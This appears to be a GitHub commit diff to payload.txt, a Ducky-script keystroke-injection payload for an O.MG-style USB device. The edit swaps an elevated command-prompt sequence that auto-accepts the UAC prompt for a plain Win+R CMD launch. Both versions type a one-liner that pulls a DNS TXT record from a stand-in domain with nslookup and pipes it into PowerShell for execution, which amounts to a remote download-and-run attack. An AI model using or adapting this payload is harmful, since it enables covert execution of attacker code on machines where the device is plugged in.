Update payload.txt

pull/7/head
Keld Norman 2021-10-18 20:00:14 +02:00 committed by GitHub
parent 5f8a7cc4f8
commit ab0e2be92c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 11 deletions

View File

@ -38,17 +38,11 @@ for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" omg.yourdomain.com 2^>nul^|
# In OMG code that would be: # In OMG code that would be:
#----------------------------------------------------------------------------------------------------------- #-----------------------------------------------------------------------------------------------------------
DUCKY_LANG US DUCKY_LANG US
DELAY 3000 GUI r
CONTROL ESCAPE
DELAY 500
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
CTRL-SHIFT ENTER
DELAY 1000 DELAY 1000
ALT Y STRING CMD
DELAY 500
ENTER ENTER
DELAY 500 DELAY 500
STRING cmd /c for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" omg.yourdomain.com 2^>nul^|find /I """"`) do @echo|set /p="%~a"|powershell -Command - STRING for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" omg.yourdomain.com 2^>nul^|find /I """"`) do @echo|set /p="%~a"|powershell -Command -
ENTER ENTER
#----------------------------------------------------------------------------------------------------------- #-----------------------------------------------------------------------------------------------------------